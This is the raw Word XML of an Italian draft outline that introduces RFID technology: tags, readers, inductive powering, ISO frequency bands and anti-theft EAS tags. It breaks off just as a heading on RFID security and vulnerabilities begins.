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B89" w:rsidRPr="00A4657F" w:rsidRDefault="001B1B89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Scaletta:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1B89" w:rsidRPr="00A4657F" w:rsidRDefault="001B1B89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>introduzione</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1B89" w:rsidRDefault="001B1B89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>cosa è?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A4657F" w:rsidRPr="00A4657F" w:rsidRDefault="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A4657F" w:rsidRDefault="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Wikipedia dice:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A4657F" w:rsidRDefault="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>RFID</w:t>
      </w:r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>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(o</w:t>
      </w:r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>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">Radio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Frequency</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>IDentification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r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>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Identificazione a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>radio frequenza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">) è una tecnologia per la identificazione automatica di oggetti, animali o persone (AIDC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Automatic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13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000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Identifing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Capture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">) basata sulla capacità di memorizzare e accedere a distanza a tali dati usando dispositivi elettronici (chiamati TAG o transponder) che sono in grado di rispondere comunicando le informazioni in essi contenute quando "interrogati". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A4657F" w:rsidRDefault="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRDefault="00496616" w:rsidP="00496616">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK2"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK1"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Per RFID quindi una intende la tecnologia per l’identificazione wireless.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRPr="00496616" w:rsidRDefault="00496616" w:rsidP="00496616">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00496616">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>“un equivalente dei codici a barre, ma via</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRPr="00496616" w:rsidRDefault="00496616" w:rsidP="00496616">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496616">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>radio”, pertanto leggibile da remoto e senza contatto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A4657F" w:rsidRDefault="00496616" w:rsidP="00496616">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496616">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">visivo (line of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496616">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>sight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496616">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in realtà può essere molto di più)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="00496616" w:rsidRDefault="00496616">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Un Sistema RFID è formato da un Lettore e un Tag.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="00A4657F" w:rsidRDefault="00A4657F" w:rsidP="00A465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Un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tag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RFID (detto anche transponder) e' un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microchip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">che contiene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dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">+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un numero univoco universale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e grazie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A4657F" w:rsidRDefault="00A4657F" w:rsidP="00A4657F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ad un' antenna integrata può ricevere e trasmettere radiofrequenza ad un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tranreceiver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RFID.</w:t>
      </w:r>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Questo componente elettronico ha l'aspetto di una etichetta adesiva e può essere grande anche solo pochi millimetri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRDefault="002D60FC" w:rsidP="00496616">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:spacing w:before="96" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast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Il Lettore emette un campo elettromagnetico/elettrico che</w:t>
      </w:r>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>, che tramite il principio della</w:t>
      </w:r>
      <w:r w:rsidR="00496616"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 w:rsidR="00496616" w:rsidRPr="002259B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>induzione</w:t>
      </w:r>
      <w:r w:rsidR="00496616"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 w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>trasforma in</w:t>
      </w:r>
      <w:r w:rsidR="00496616"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 w:rsidR="00496616" w:rsidRPr="002259B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>energia elettrica</w:t>
      </w:r>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>, che alimenta il</w:t>
      </w:r>
      <w:r w:rsidR="00496616"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 w:rsidR="00496616" w:rsidRPr="002259B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>microchip</w:t>
      </w:r>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">. Il chip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>cosi'</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> attivato trasmette i dati in esso contenuti tramite l'antenna (circuito di trasmissione del segnale) all'apparato che riceve i dati. In sintesi, un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> RFID è in grado di ricevere e di trasmettere via radiofrequenza le informazioni contenute nel chip ad un</w:t>
      </w:r>
      <w:r w:rsidR="00496616"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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>transceiver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00496616"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 w:rsidR="00496616">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>RFID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRDefault="00496616" w:rsidP="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRDefault="00496616" w:rsidP="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRDefault="00496616" w:rsidP="00A4657F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[foto]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRDefault="00496616" w:rsidP="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:spacing w:before="96" w:after="120" w:line="360" w:lineRule="atLeast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Esistono diversi tipi di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 RFID, alcuni dei quali normati da standard</w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tooltip="Organizzazione Internazionale per le Standardizzazioni" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>ISO</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="36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>125/134 k</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tooltip="Hertz" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Hz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="36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>13,56 MHz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="36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>868/915 MHz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="36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>&gt;2,4 GHz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Classificazione e sicurezza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più semplici sono di tipo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chipless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, costituiti dalla sola antenna, che hanno l’unico scopo di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rivelare la loro presenza in vicinanza di un’antenna di lettura. Ne sono un esempio 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EAS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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Electronic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Article</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444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color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Surveillance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usati nei sistemi antitaccheggio.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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ICUREZZA DI SISTEMI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>: C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RTICITA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>E VULNERABILITA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>IN AMBIENTI ETEROGENEI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Spostandoci lungo la linea della loro organizzazione classica, cioè dalla classe 0 alla 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ª</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
